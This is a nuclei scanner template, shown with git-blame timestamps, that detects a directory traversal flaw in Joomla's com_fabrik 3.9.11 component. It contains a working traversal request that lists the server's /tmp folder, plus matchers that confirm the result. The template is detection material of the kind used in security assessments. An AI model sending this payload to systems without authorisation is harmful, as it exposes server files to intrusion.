nuclei-templates/vulnerabilities/other/joomla-com-fabrik-lfi.yaml

28 lines
657 B
YAML
Raw Normal View History

2021-05-07 09:23:34 +00:00
id: joomla-com-fabrik-lfi
2021-05-05 18:18:57 +00:00
info:
name: Joomla! com_fabrik 3.9.11 - Directory Traversal
author: dhiyaneshDk
severity: high
2021-05-07 09:23:34 +00:00
tags: joomla,lfi
2021-05-05 18:18:57 +00:00
reference: https://www.exploit-db.com/exploits/48263
requests:
- method: GET
path:
- '{{BaseURL}}/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/'
2021-05-07 09:23:34 +00:00
2021-05-05 18:18:57 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-05-07 09:23:34 +00:00
- '"value":'
2021-05-05 18:18:57 +00:00
- '"disable":false'
2021-05-07 09:23:34 +00:00
- 'text'
2021-05-05 18:18:57 +00:00
part: body
2021-05-07 09:23:34 +00:00
condition: and
2021-05-05 18:18:57 +00:00
- type: status
status:
- 200